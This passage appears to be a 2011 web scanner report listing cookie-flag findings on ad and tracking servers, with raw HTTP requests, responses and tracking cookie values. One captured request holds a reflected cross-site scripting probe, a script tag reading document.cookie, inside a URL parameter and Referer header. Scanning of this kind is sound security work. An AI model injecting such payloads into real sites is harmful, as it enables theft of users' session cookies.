GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.35.10.1296251844
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:31:17 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: RMFD=011PiwJwO101yed8|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1415 Content-Type: application/x-javascript
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:21 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 332 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:11 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@x05!x05 HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/track/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.20.10.1296251844
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:14:48 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 61 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_mjx.ads/bh.heraldinteractive.com/home/1392253820@Position1,Position2? HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:30 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1274 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/
function OAS_RICH(position) { if (position == 'Position1') { document.write ('<a href="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/396181020/Positio ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: pu.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: pu.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click?clid=5369bdc&rand=1296224077262&sid=&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D853584%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000101%2C1220000101%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D69%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3Bp%3D6%3Bf%3D990638%3Bh%3D922865%3Bk%3Dhttp%3A%2F%2Fhpi.rotator.hadj7.adjuggler.net%2Fservlet%2Fajrotator%2F63722%2F0%2Fcj%2FV127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016%2F HTTP/1.1 Host: smm.sitescout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT SAdBuild: 400 P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml" Set-Cookie: sadscpax=5369bdc-; Domain=smm.sitescout.com; Expires=Sat, 29-Jan-2011 17:29:42 GMT; Path=/ Location: http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/http%3A%2F%2Fconsumertipsonline.net%2Fhealth%2Fus4.php%3Ft%3D59 Content-Length: 0 Date: Fri, 28 Jan 2011 17:05:41 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mmtnt.php HTTP/1.1 Host: syndication.mmismm.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: G=10120000000990801741
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:39 GMT Server: Apache Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV" Set-Cookie: G=10120000000990801741; expires=Fri, 29-Jan-2016 03:57:39 GMT; path=/; domain=.mmismm.com Content-Length: 462 Content-Type: text/javascript
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582 HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9; cw=cw
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET CW-Server: CW-WEB23 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 2094 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Fri, 28 Jan 2011 17:37:49 GMT Connection: close Set-Cookie: V=gFEcJzqCjXJj; domain=.contextweb.com; expires=Sat, 28-Jan-2012 17:37:48 GMT; path=/ Set-Cookie: 513102_300X250_50151=1/28/2011 12:37:49 PM; domain=.contextweb.com; path=/ Set-Cookie: vf=1; domain=.contextweb.com; expires=Sat, 29-Jan-2011 05:00:00 GMT; path=/
lm="28 Jan 2011 14:48:42 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
lm="28 Jan 2011 17:06:05 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /oz/sensor HTTP/1.1 Host: tap.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="28 Jan 2011 14:48:45 GMT"; ses15=7477^8; put_2132=D8DB51BF08484217F5D14AB47F4002AD; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1185=3011330574290390485; rdk15=0; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1; rdk=5804/7477; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3178300.js^1^1296232904^1296232904&3168345.js^1^1296232903^1296232903&3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; dq=15|4|11|0; put_1994=6ch47d7o8wtv; SERVERID=; put_2100=usr3fd748acf5bcab14; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; csi2=3174527.js^5^1296226121^1296232915&3138805.js^2^1296224077^1296226130&3178295.js^1^1296226112^1296226112; put_1986=4760492999213801733; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rdk2=0; ses2=7477^9; cd=false;
Response
HTTP/1.1 204 No Content Date: Fri, 28 Jan 2011 17:06:05 GMT Server: TRP Apache-Coyote/1.1 p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: Tue, 01 Jan 2008 00:12:30 GMT Cache-control: private Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/ Set-Cookie: dq=16|4|12|0; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/ Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/ Set-Cookie: lm="28 Jan 2011 17:06:05 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/ Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
var oo_profile={ tokenType : "0", tracking : "", tags : "Education,Beauty,Family and Parenting,Hobbies and Interests,Travel and Tourism High Affinity,Swing Voters", tagcloud : [ { tag ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt HTTP/1.1 Host: this.content.served.by.adshuffle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 01:41:09 GMT Location: http://search.mylife.com/wp-wsfy?s_cid=$208$DISd42f2251fd9347828c931695680ca71619a6ca0eeddb444d9be1d8e2a327f4b1 Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: ac1=51f37.693f3=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0|c51F37:693F3_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sat, 29 Jan 2011 01:41:08 GMT Content-Length: 228 Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:09 GMT;path=/
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://search.mylife.com/wp-wsfy?s_cid=$208$DISd42f2251fd9347828c931695680ca71619a6ca0eeddb444d9be1d8e2a327f4b1">here ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl?_ADTIME_ HTTP/1.1 Host: this.content.served.by.adshuffle.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v=576462396875340721; ts=1/29/2011+12:42:58+AM; z=4; sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html Expires: Sat, 29 Jan 2011 00:59:18 GMT Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/ Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sat, 29 Jan 2011 00:59:18 GMT Content-Length: 43 Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:04:18 GMT;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt HTTP/1.1 Host: this.content.served.by.adshuffle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 01:41:08 GMT Location: http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: ac1=51f37.6292a=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111939; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B69B_0_0|c51F37:6292A_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sat, 29 Jan 2011 01:41:08 GMT Content-Length: 229 Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:08 GMT;path=/
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e">her ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt&clickTag2=http:/r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161^935955^1183^0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64 HTTP/1.1 Host: this.content.served.by.adshuffle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/7.0 Date: Sat, 29 Jan 2011 01:41:07 GMT Content-Length: 0 Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:08 GMT;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
